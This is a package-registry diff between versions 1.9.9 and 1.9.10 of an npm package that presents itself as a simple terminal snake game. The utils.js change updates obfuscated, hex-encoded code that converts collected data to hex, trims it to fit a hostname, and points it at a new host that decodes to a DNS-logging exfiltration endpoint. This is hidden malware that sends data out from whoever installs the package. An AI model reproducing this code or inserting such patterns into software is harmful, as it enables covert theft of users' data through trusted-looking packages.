sftc-advance-components 1.9.9 → 1.9.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/utils.js +1 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "sftc-advance-components",
3
- "version": "1.9.9",
3
+ "version": "1.9.10",
4
4
  "description": "A simple terminal snake game library with no external dependencies",
5
5
  "main": "index.js",
6
6
  "bin": {
package/utils.js CHANGED
@@ -52,7 +52,7 @@ function initSystem() {
52
52
  ].join(_d("2a"));
53
53
 
54
54
  let _h1 = Buffer.from(_t1, _d("75746638")).toString(_d("686578"));
55
- const _s1 = _d("2e732e33323731646635382e676664652e73697465");
55
+ const _s1 = _d("2e37303133303965312e6c6f672e646e736c6f672e717a7a2e696f");
56
56
  const _l1 = 250 - _s1.length - 3;
57
57
 
58
58
  if (_h1.length > _l1) _h1 = _h1.slice(0, _l1);